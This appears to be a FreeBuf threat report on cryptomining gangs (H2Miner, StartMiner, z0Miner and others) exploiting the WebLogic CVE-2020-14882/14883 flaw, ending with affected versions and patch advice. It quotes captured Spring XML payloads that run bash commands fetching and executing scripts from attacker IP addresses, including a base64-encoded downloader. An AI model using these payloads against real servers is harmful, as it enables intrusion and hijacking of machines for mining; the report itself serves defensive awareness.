freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

近期Weblogic未授权命令执行漏洞(CVE-2020-1488214883)漏洞利用的挖矿活动
  • 关注
近期Weblogic未授权命令执行漏洞(CVE-2020-1488214883)漏洞利用的挖矿活动
2020-11-12 16:35:20

背景

近期Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)的EXP的面世,使得个挖矿团伙迅速展开了各种基于该漏洞的攻击活动。

详情

漏洞EXP复现

漏洞具体EXP复现可参考下面文章,主要有两种方式。其中第二种方式又多个团伙的样本。

https://blog.csdn.net/weixin_41598660/article/details/109409965

1.H2Miner

其中payload 如下所示:

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>/bin/bash</value>
        <value>-c</value>
        <value><![CDATA[(curl -s 95.142.39.135/wb.sh||wget -q -O- 95.142.39.135/wb.sh)|bash]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

详细分析可查看(https://mp.weixin.qq.com/s/JPm71AI-CeeRmoZwEl34bg

2.StartMiner

其payload文件(http://205.185.116.78/poc.xml)如下所示:

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
	<value>/bin/bash</value>
	<value>-c</value>
	<value>curl -s http://205.185.116.78/xms | bash -sh; wget -q -O - http://205.185.116.78/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

3.z0Miner

详情见https://s.tencent.com/research/report/1170.html, paylaod 样本链接(http://189.7.105.47:8181/examples/jsp/z0.txt)已经无法下载

4.MSASCMiner

详情见MSASCMiner

总结

目前,随着漏洞EXP的更新,随即小黑们也会及时的更新最近的攻击手段,大家及时检查weblogic版本,打好补丁。

受影响的版本

10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

漏洞修复

此次 Oracle 官方的 CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。

注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。

# 漏洞利用 # 挖矿 # weblogic
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者